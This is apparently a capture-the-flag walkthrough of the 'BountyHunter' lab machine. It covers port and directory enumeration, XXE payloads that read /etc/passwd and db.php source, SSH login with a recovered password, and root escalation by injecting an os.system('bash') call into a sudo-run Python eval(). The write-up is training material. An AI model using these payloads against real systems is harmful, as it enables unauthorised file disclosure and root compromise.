BountyHounter
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.11.100 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Fri Jun 24 12:23:35 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.11.100
Nmap scan report for 10.10.11.100
Host is up (0.067s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Fri Jun 24 12:23:48 2022 -- 1 IP address (1 host up) scanned in 13.45 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,80,8065 10.10.11.100 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Fri Jun 24 12:24:02 2022 as: nmap -sCV -p22,80 -oN targeted 10.10.11.100
Nmap scan report for 10.10.11.100
Host is up (0.049s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
| 256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_ 256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 24 12:24:35 2022 -- 1 IP address (1 host up) scanned in 33.22 secondsIf we take a look at the website, we'll see a basic website with irrelevant information.
Let's try to enumerate subdirectories with gobuster.
gobuster dir -u http://10.10.11.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 -x txt,php
direnumerates directories or files.-uthe target URL.-wpath to the wordlist.-tnumber of current threads, in this case 200 threads.-xfile extensions to search for.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.100
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
2022/06/24 14:57:07 Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 313] [--> http://10.10.11.100/assets/]
/portal.php (Status: 200) [Size: 125]
/css (Status: 301) [Size: 310] [--> http://10.10.11.100/css/]
/js (Status: 301) [Size: 309] [--> http://10.10.11.100/js/]
/db.php (Status: 200) [Size: 0]
===============================================================
2022/06/24 15:00:19 Finished
===============================================================If we take a look at the /portal.php directory, we'll see a message saying that the portal is under development, and it shows another page in /log_submit.php.
Let's take a look at the /log_submit.php page.
Let's try to fill of the input fields with the test word and hit on Submit.
Exploitation
It looks like the input is being represented by the server in the server response. Let's take a look at how the requests are being made. Intercept the request with BurpSuite, and send it to the repeater.
The POST request is sending a URL and Base64 encoded message. We can decode the message in BurpSuite by selecting the entire message, and pressing Ctrl+Shift+U to URL decoded it, and then Ctrl+Shift+B to base64 decode it. We should see an XML message.
At this point, we could try to do an XXE attack.
In order to get the /etc/passwd file, we could create an external entity which will load a specific file.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<bugreport>
<title>&xxe;</title>
<cwe>test</cwe>
<cvss>test</cvss>
<reward>test</reward>
</bugreport>If now we encode it to base64 with Ctrl+B and then encode it to URL with Ctrl+U, and then send the request, we should see the /etc/passwd file in the server response.
Now, we could see the content of the db.php file which we found on the subdirectories enumeration with gobuster. We'll have to use the wrapper php://filter/convert.base64-encode/resource=db.php so we get the content of the file base64 encoded.
data=<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php" >]>
<bugreport>
<title>&xxe;</title>
<cwe>test</cwe>
<cvss>test</cvss>
<reward>test</reward>
</bugreport>
If we decode the base64 string in the server response, we'll see some credentials.
Now, we could try to log in via SSH with the user development we found in the /etc/passwd file, and the password m19RoAU0hP41A1sTsq6K. Then, we could grab the user flag.
sshpass -p 'm19RoAU0hP41A1sTsq6K' ssh development@10.10.11.100
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri 24 Jun 2022 01:54:11 PM UTC
System load: 0.0
Usage of /: 24.2% of 6.83GB
Memory usage: 16%
Swap usage: 0%
Processes: 214
Users logged in: 0
IPv4 address for eth0: 10.10.11.100
IPv6 address for eth0: dead:beef::250:56ff:feb9:5f4b
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Jul 21 12:04:13 2021 from 10.10.14.8
development@bountyhunter:~$ cat user.txt
e3251651591eaaceefd492d9007cb7ccPrivilege Escalation
If we take a look at the sudo permissions, we'll see that we can execute a script with Python3.8 as the root user.
sudo -l
Matching Defaults entries for development on bountyhunter:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User development may run the following commands on bountyhunter:
(root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.pyLet's see the script permissions.
ls -l /opt/skytrain_inc/ticketValidator.py
-r-xr--r-- 1 root root 1471 Jul 22 2021 /opt/skytrain_inc/ticketValidator.pyWe can only read the script. Let's take a look at it.
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.
def load_file(loc):
if loc.endswith(".md"):
return open(loc, 'r')
else:
print("Wrong file type.")
exit()
def evaluate(ticketFile):
#Evaluates a ticket to check for ireggularities.
code_line = None
for i,x in enumerate(ticketFile.readlines()):
if i == 0:
if not x.startswith("# Skytrain Inc"):
return False
continue
if i == 1:
if not x.startswith("## Ticket to "):
return False
print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
continue
if x.startswith("__Ticket Code:__"):
code_line = i+1
continue
if code_line and i == code_line:
if not x.startswith("**"):
return False
ticketCode = x.replace("**", "").split("+")[0]
if int(ticketCode) % 7 == 4:
validationNumber = eval(x.replace("**", ""))
if validationNumber > 100:
return True
else:
return False
return False
def main():
fileName = input("Please enter the path to the ticket file.\n")
ticket = load_file(fileName)
#DEBUG print(ticket)
result = evaluate(ticket)
if (result):
print("Valid ticket.")
else:
print("Invalid ticket.")
ticket.close
main()Basically, the script is reading a file. That file should have the .md extensions, and it should start with the following lines.
# Skytrain Inc
## Ticket to
__Ticket Code:__The next line should be ** followed by a number that if divided by 7, the remainder should be 4, for example the 11. Then it should end with a + sign followed by a random number.
**11+Then, the script uses the eval() function. We could exploit this function, so when we execute the script, we will get a shell as root. The final test.md file should look like this.
# Skytrain Inc
## Ticket to
__Ticket Code:__
**11+8 and __import__("os").system("bash")If we execute the script with sudo privileges, and indicate the test.md file, we should get a shell as the root user. And then all we have to do is reap the harvest and take the root flag.
sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
Please enter the path to the ticket file.
test.md
Destination:
root@bountyhunter:/home/development# whoami
root
root@bountyhunter:/home/development# id
uid=0(root) gid=0(root) groups=0(root)
root@bountyhunter:/home/development# cat /root/root.txt
2b946c05b9ee9aea25eab3754353be74Last updated
Was this helpful?